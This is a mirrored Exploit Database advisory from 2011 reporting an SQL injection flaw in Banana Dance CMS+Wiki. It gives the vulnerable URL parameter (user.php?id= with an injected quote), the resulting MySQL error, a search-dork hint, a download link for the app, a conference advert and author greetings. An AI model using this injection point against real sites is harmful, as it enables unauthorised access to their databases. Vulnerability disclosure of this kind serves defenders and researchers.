Banana Dance CMS and Wiki – SQL Injection

• Exploit Database
• 116 阅读

• 作者： Aodrulez
  日期： 2011-10-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17919/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  +-----------------------+ | Banana Dance CMS+Wiki | +-----------------------+   Vulnerable Web-App : Banana Dance CMS+Wiki Vulnerability: SQLi Author : Aodrulez. Email: f3arm3d3ar@gmail.com Google-Dork: :) Guess it. Tested on: Ubuntu 10.04 Web-App: http://www.doyoubananadance.com/ Download Link: http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7 +---------+ | Details | +---------+   1] SQLi Exploit : http://localhost/user.php?id=1&apos;[sqli]   Error: ------ Invalid query: SELECT <code>key</code>,<code>value</code> FROM <code>bd_user_data</code> WHERE <code>user_id</code>=&apos;1&apos;&apos; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &apos;&apos;1&apos;&apos;&apos; at line 1       +----------+ |MalCon| +----------+ (International Malware Conference)   The CFP for MalCon-2011 is ON! If you think you are good enough, try cracking our &apos;Capture the Mal Challenge-2011&apos; online. Open to everyone!   For more details, visit http://malcon.org         +-------------------+ | Greetz Fly Out To | +-------------------+   1] Amforked(): My Mentor. 2] The Blue Genius : My Boss. 3] str0ke (milw0rm) 4] www.orchidseven.com 5] www.malcon.org 6] www.isac.org.in 7] www.nsd.org.in 8] LiquidWorm +-------+ | Quote | +-------+ "Microsoft is not the answer. Microsoft is the question. NO is the answer." - Erik Naggum